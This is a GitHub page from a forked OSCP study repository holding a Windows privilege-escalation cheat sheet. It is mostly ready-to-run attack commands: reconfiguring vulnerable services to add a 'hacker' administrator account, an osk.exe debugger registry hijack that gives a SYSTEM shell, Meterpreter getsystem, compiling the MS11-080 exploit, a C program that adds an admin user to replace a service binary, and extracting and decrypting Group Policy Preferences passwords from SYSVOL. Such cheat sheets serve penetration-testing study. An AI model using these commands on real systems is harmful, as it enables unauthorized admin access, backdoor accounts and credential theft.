forked from sd-geek/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 14
/
09 - Privilege Escalation Windows
72 lines (56 loc) · 2.85 KB
/
09 - Privilege Escalation Windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
Vulnerable Services
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
$ sc qc <[VULNERABLE_SERVICE]>
$ sc query <[VULNERABLE_SERVICE]>
$ sc config <[VULNERABLE_SERVICE]> obj= ".\LocalSystem" password= ""
$ sc config <[VULNERABLE_SERVICE]> start= "auto"
$ sc config <[VULNERABLE_SERVICE]> binpath= "net user hacker Hacker123 /add"
$ sc stop <[VULNERABLE_SERVICE]>
$ sc start <[VULNERABLE_SERVICE]>
$ sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup administrator hacker /add"
$ sc stop <[VULNERABLE_SERVICE]>
$ sc start <[VULNERABLE_SERVICE]>
$ sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup \"Remote Desktop Users\" hacker /add"
$ sc stop <[VULNERABLE_SERVICE]>
$ sc start <[VULNERABLE_SERVICE]>
Win10:
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
Then ctrl+alt+canc and start virtual keyboard
Windows Privilege Escalation resource http://www.fuzzysecurity.com/tutorials/16.html
Try the getsystem command using meterpreter - rarely works but is worth a try.
meterpreter > getsystem
Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
# python pyinstaller.py --onefile ms11-080.py mx11-080.exe -O XP
Powershell Priv Escalation Tools
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Windows Service Configuration Viewer - Check for misconfigurations in services that can lead to privilege escalation. You can replace the executable with your own and have windows execute whatever code you want as the privileged user.
icacls scsiaccess.exe
scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)
Compile a custom add user command in windows using C
# cat useradd.c
# include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
int i;
i=system ("net localgroup administrators low /add");
return 0;
}
# i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
Group Policy Preferences (GPP)
A common useful misconfiguration found in modern domain environments is unprotected Windows GPP settings files
map the Domain controller SYSVOL share
net use z: \\dc01\SYSVOL
Find the GPP file: Groups.xml
dir /s Groups.xml
Review the contents for passwords
type Groups.xml
Decrypt using GPP Decrypt
gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
Find and display the proof.txt or flag.txt - get the loot! #meterpreter > run post/windows/gather/win_privs
cd\ & dir /b /s proof.txt type c:\pathto\proof.txt